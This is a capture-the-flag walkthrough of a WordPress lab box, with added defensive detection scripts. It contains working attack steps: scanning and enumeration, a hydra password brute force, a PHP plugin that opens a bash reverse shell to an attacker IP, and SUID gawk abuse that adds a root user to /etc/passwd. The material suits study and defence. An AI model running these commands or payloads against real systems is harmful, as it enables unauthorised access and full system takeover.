
BadPlugin

export TARGET_IP=192.168.1.100
sudo nmap -Pn -sS -p- $TARGET_IP

PORT   STATE SERVICE
80/tcp open  http

Directory and File Enumeration

feroxbuster -u http://$TARGET_IP -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x txt,php,bak,db,py,html,js,jpg,png,git,sh -t 200 --random-agent --no-state -d 10

Key Findings:

  • http://192.168.1.100/wordpress/
  • http://192.168.1.100/wordpress/wp-login.php

Hostname Resolution

  • To reach the target by its intended hostname, we added an entry to the local /etc/hosts file.
  • The hostname was shown in the URL when I tried to access the paths found.

echo "$TARGET_IP   escolares.dl" | sudo tee -a /etc/hosts

Vulnerability Scanning

wpscan --url http://escolares.dl/wordpress/ --enumerate p,t,u

This scans the site for known vulnerabilities and enumerates plugins (p), themes (t) and users (u).

Key Findings:

  • XML-RPC is enabled: http://escolares.dl/wordpress/xmlrpc.php
  • WordPress theme: astra (outdated)
  • Plugins: astra-sites, elementor (both outdated)
  • User: admin

Authentication Bypass Attempt

  • The previous scan confirmed that the username admin is accepted, but the password could not be immediately determined.

  • We will use hydra or a similar tool to perform a dictionary attack against the WordPress login page, targeting the "admin" user.

    • We inspected the login form's POST request in the browser's Network panel. The following data was observed in the request body:
      log=admin&pwd=sadasd&wp-submit=Acceder&redirect_to=http%3A%2F%2Fescolares.dl%2Fwordpress%2Fwp-admin%2F&testcookie=1
    • The corresponding error message on an invalid password attempt was: "la contraseña que has introducido para el nombre de usuario". This substring is the failure marker hydra uses to recognise a wrong password.

hydra -l admin -P /usr/share/wordlists/rockyou.txt -f -vV -t 4 $TARGET_IP http-post-form "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Acceder&redirect_to=http%3A%2F%2Fescolares.dl%2Fwordpress%2Fwp-admin%2F&testcookie=1:la contraseña que has introducido"

Results:

  • Successful login with admin:rockyou
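The hydra run above shows up in the web server's access log as a burst of POSTs to wp-login.php from one source. As an added defender-side example (not part of the original write-up), the following Python flags that pattern; the log lines are constructed here, and the 200-versus-302 distinction reflects how WordPress answers a failed login (form re-rendered) and a successful one (redirect to redirect_to).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Combined log format (Apache/nginx); only the fields the detector needs are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def detect_wp_login_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Return {ip: {...}} for sources that POST to wp-login.php more than
    `threshold` times inside any sliding `window`. A 302 after the burst means
    the dictionary attack found a working password."""
    attempts, successes = defaultdict(list), defaultdict(int)
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or not m["path"].endswith("wp-login.php"):
            continue
        ip, status = m["ip"], int(m["status"])
        attempts[ip].append(datetime.strptime(m["ts"], TS_FMT))
        if status == 302:
            successes[ip] += 1
    flagged = {}
    for ip, times in attempts.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:   # shrink window from the left
                start += 1
            if end - start + 1 > threshold:
                flagged[ip] = {"attempts": len(times), "success_after": successes[ip] > 0}
                break
    return flagged

def sample_log():
    """Constructed access-log lines: one normal visitor, one host hammering the login form."""
    base = datetime(2024, 5, 1, 10, 0, 0, tzinfo=timezone.utc)
    def line(ip, secs, req, status):
        ts = (base + timedelta(seconds=secs)).strftime(TS_FMT)
        return f'{ip} - - [{ts}] "{req} HTTP/1.1" {status} 1024'
    lines = [line("192.168.1.50", 0, "GET /wordpress/", 200),
             line("192.168.1.50", 5, "POST /wordpress/wp-login.php", 302)]
    lines += [line("192.168.1.1", 2 * i, "POST /wordpress/wp-login.php", 200) for i in range(12)]
    lines.append(line("192.168.1.1", 30, "POST /wordpress/wp-login.php", 302))
    return lines
```

Feeding a real log means reading the file line by line into detect_wp_login_bruteforce; the thresholds are starting points, not tuned values.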

Reverse Shell Plugin

warning

Pay special attention to the IP of the victim machine. In my case it is 192.168.1.100, which is why I am using 192.168.1.1 as my attacker IP. Check ifconfig. It is important to be on the same network.

Set up a Netcat Listener

nc -lvnp 4444

Create and Upload a Malicious Plugin:

shell.php

<?php
/*
Plugin Name: Dirty Plugin
Description: Activate Plugin and get Reverse Shell.
Version: 1
Author: B0end
*/

# Change values if necessary
define('ATTACKER_IP', '192.168.1.1');
define('ATTACKER_PORT', 4444);

error_reporting(E_ALL);
ini_set('display_errors', 1);

// Construct the reverse shell command
$command = sprintf(
    "bash -c '/bin/bash -i >& /dev/tcp/%s/%d 0>&1'",
    ATTACKER_IP,
    ATTACKER_PORT
);

// Execute the command and check for errors
$result = system($command, $returnCode);

// Basic error handling
if ($returnCode !== 0) {
    echo "Error executing reverse shell command. Return code: " . $returnCode . "<br>";
    if ($result === false) {
        echo "system() function call failed.<br>";
    }
}
?>

zip -r shell.zip shell.php

Upload and activate the plugin via the WordPress admin panel (the shell also fires if you browse directly to http://escolares.dl/wordpress/wp-content/plugins/shell/shell.php).
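Two defender-side checks for this step, added here and not part of the original write-up: a scan of wp-content/plugins sources for plugins that call exec-family PHP functions (a single-file plugin doing so is the shape of the dropper above), and a check that wp-config.php sets DISALLOW_FILE_MODS, the WordPress constant that removes the plugin upload and editor screens this path depends on. The plugin tree and config strings are constructed samples.

```python
import re

# PHP functions that hand a string to the OS shell or to the interpreter; a plugin
# that only renders content has no legitimate reason to call them.
EXEC_FUNCS = ("system", "exec", "shell_exec", "passthru", "proc_open", "popen", "eval")
CALL_RE = re.compile(r"\b(" + "|".join(EXEC_FUNCS) + r")\s*\(", re.IGNORECASE)
HEADER_RE = re.compile(r"^\s*\*?\s*Plugin Name:\s*(.+?)\s*$", re.MULTILINE)

def scan_plugin_sources(files):
    """files maps wp-content/plugins-relative paths to PHP source. Returns one
    finding per file that calls an exec-family function, with the plugin name
    from its header (if any) and whether the plugin is a single file."""
    per_plugin = {}
    for path in files:
        per_plugin.setdefault(path.split("/")[0], []).append(path)
    findings = []
    for path, src in sorted(files.items()):
        calls = sorted({m.group(1).lower() for m in CALL_RE.finditer(src)})
        if not calls:
            continue
        header = HEADER_RE.search(src)
        findings.append({"path": path,
                         "plugin": header.group(1) if header else None,
                         "calls": calls,
                         "single_file": len(per_plugin[path.split("/")[0]]) == 1})
    return findings

def file_mods_disabled(wp_config):
    """True when wp-config.php defines DISALLOW_FILE_MODS as true, which removes
    the plugin upload/install and editor screens from the admin panel."""
    m = re.search(r"define\(\s*['\"]DISALLOW_FILE_MODS['\"]\s*,\s*(true|false)\s*\)",
                  wp_config, re.IGNORECASE)
    return bool(m and m.group(1).lower() == "true")

# Constructed sample tree: a harmless two-file plugin and a single-file dropper.
SAMPLE_FILES = {
    "hello/hello.php": "<?php\n/*\nPlugin Name: Hello\n*/\nfunction hello() { echo 'hi'; }\n",
    "hello/readme.txt": "Hello plugin readme\n",
    "shell/shell.php": "<?php\n/*\nPlugin Name: Dirty Plugin\n*/\n$r = system($cmd, $rc);\n",
}
SAMPLE_CONFIG_WEAK = "<?php\ndefine('DB_NAME', 'wordpress');\n"
SAMPLE_CONFIG_HARDENED = SAMPLE_CONFIG_WEAK + "define('DISALLOW_FILE_MODS', true);\n"
```

On a live site, build the files mapping by walking wp-content/plugins and reading each *.php file; matches in legitimate plugins still deserve a look, but the combination of an exec call, a fresh install date and a single-file layout is the strong signal.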

Privilege Escalation

Identifying SUID/SGID Binaries

Our initial step involves searching for binaries that have the SUID (Set User ID) or SGID (Set Group ID) permission bits set. These special permissions allow a user to execute a file with the privileges of the file's owner or group, respectively. Misconfigured SUID/SGID binaries can be potential avenues for privilege escalation.

We use the find command to locate these binaries:

find / -perm -u=s -type f 2>/dev/null    # SUID binaries
find / -perm -g=s -type f 2>/dev/null    # SGID binaries

Explanation of find options:

  • /: Specifies the root directory as the starting point for the search.
  • -perm -u=s: Searches for files with the SUID permission bit set.
  • -perm -g=s: Searches for files with the SGID permission bit set.
  • -type f: Limits the search to regular files only.
  • 2>/dev/null: Redirects any error messages (e.g., "Permission denied") to /dev/null, suppressing them from the output.

Notable Finding:

  • /usr/bin/gawk

The gawk binary has the SUID bit set and is owned by root, so whenever any user executes it, gawk runs with root privileges. We can potentially exploit this to gain root access.

Exploiting gawk to Add a Root User

We can leverage gawk's capabilities to manipulate the /etc/passwd file, which stores user account information. Specifically, we'll append a new user with root-level privileges (UID 0 and GID 0) to this file.

Steps:

  1. Generate a Password Hash:

    First, we generate a strong password hash using the mkpasswd utility with the SHA-512 algorithm:

    mkpasswd -m sha-512

    The tool will prompt you to enter your desired password. Important: Remember to replace your_generated_hash in the subsequent command with the actual hash generated in this step.

  2. Append User to /etc/passwd using gawk:

    Next, we use the following gawk command to append a new user named b0end with root privileges to the /etc/passwd file:

    gawk -v user="b0end" -v hash='your_generated_hash' 'BEGIN {FS=OFS=":"; print user ":" hash ":0:0:root user:/root:/bin/bash" >> "/etc/passwd"; exit}'

    Explanation:

    • gawk -v user="b0end" -v hash='your_generated_hash': Invokes gawk and defines two variables: user (set to the desired username "b0end") and hash (set to the password hash generated in the previous step). The single quotes around the hash matter, because SHA-512 crypt hashes contain $ characters that the shell would otherwise expand.
    • 'BEGIN {FS=OFS=":"}: Sets the input and output field separators to a colon (:), matching the /etc/passwd file format.
    • print user ":" hash ":0:0:root user:/root:/bin/bash": Constructs a new line in the /etc/passwd format, specifying the username, password hash, UID (0), GID (0), a comment, home directory, and the default shell.
    • >> "/etc/passwd": Appends this newly constructed line to the end of the /etc/passwd file, adding the new user without modifying existing entries.
    • exit: Immediately terminates gawk after appending the line, so it never waits for input.

  3. Verify and Log In:

    After executing the gawk command, the new root user b0end is added to the system. You can now log in as b0end using the password you set during hash generation. For example, you can use the su command to switch to the b0end user:

    su - b0end

    You will be prompted to enter the password you set for the b0end user. After successful authentication, running the id command will confirm that you have root privileges:

    id
    > uid=0(b0end) gid=0(root) groups=0(root)
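Both privilege-escalation steps above leave durable traces a defender can audit for: an unexpected SUID binary, and an /etc/passwd entry with UID 0 that is not root and carries a hash directly in the password field instead of the usual x. The following Python, added here and not part of the original write-up, implements both checks over constructed samples (the hash value and the SUID baseline are placeholders; a real baseline is the find output captured from a clean install).

```python
# Password-field values that defer to /etc/shadow or lock the account; anything
# else is a hash stored directly in /etc/passwd, as the gawk step above produces.
PASSWD_PLACEHOLDERS = {"x", "*", "!", "!!", ""}

def audit_passwd(text, allowed_uid0=("root",)):
    """Parse /etc/passwd content and return (username, reason) findings for
    extra UID 0 accounts, inline password hashes and malformed entries."""
    findings, seen = [], set()
    for lineno, raw in enumerate(text.splitlines(), 1):
        if not raw.strip():
            continue
        fields = raw.split(":")
        if len(fields) != 7:
            findings.append((f"line {lineno}", "malformed entry, expected 7 fields"))
            continue
        name, pw, uid, gid, _gecos, _home, _shell = fields
        if name in seen:
            findings.append((name, "duplicate username"))
        seen.add(name)
        if not (uid.isdigit() and gid.isdigit()):
            findings.append((name, "non-numeric uid or gid"))
            continue
        if int(uid) == 0 and name not in allowed_uid0:
            findings.append((name, "UID 0 account other than root"))
        if pw not in PASSWD_PLACEHOLDERS:
            findings.append((name, "password hash stored in /etc/passwd, not /etc/shadow"))
    return findings

def unexpected_suid(find_output, baseline):
    """Compare the output of `find / -perm -u=s -type f` against a known-good
    baseline; anything extra (here gawk) is worth investigating."""
    return sorted(set(find_output.split()) - set(baseline))

# Constructed samples: a passwd file after the gawk step (hash value is a placeholder)
# and a SUID listing in which gawk has appeared.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
b0end:$6$PLACEHOLDER$NOTAREALHASH:0:0:root user:/root:/bin/bash
"""
SUID_BASELINE = ["/usr/bin/passwd", "/usr/bin/su", "/usr/bin/sudo", "/usr/bin/mount",
                 "/usr/bin/umount", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/newgrp"]
SAMPLE_FIND = "/usr/bin/su\n/usr/bin/sudo\n/usr/bin/gawk\n/usr/bin/passwd\n"
```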